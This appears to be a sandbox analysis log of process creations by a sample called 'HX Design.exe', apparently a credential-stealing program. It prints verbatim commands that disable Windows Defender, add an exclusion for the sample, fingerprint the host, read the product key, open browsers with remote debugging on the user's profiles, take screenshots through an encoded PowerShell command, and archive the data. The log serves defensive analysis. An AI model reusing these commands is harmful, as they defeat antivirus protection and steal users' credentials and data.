Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2424 --field-trial-handle=1428,i,10138126548580973783,13072940522587371912,262144 --disable-features=PaintHolding /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2384 --field-trial-handle=1596,i,5917360806848576916,10320061818208395364,262144 --disable-features=PaintHolding /prefetch:8
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Users\user\Desktop\HX Design.exe "C:\Users\user\Desktop\HX Design.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.com	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless --restore-last-session --remote-debugging-port=2223 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local/Microsoft/Edge/User Data" https://www.google.com	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6698.tmp" "c:\Users\user\AppData\Local\Temp\33ajg45c\CSCD665F1311EED4D7D921539AB761843.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2384 --field-trial-handle=1596,i,5917360806848576916,10320061818208395364,262144 --disable-features=PaintHolding /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2424 --field-trial-handle=1428,i,10138126548580973783,13072940522587371912,262144 --disable-features=PaintHolding /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Source: C:\Users\user\Desktop\HX Design.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Section loaded: sqlite3.dll	Jump to behavior
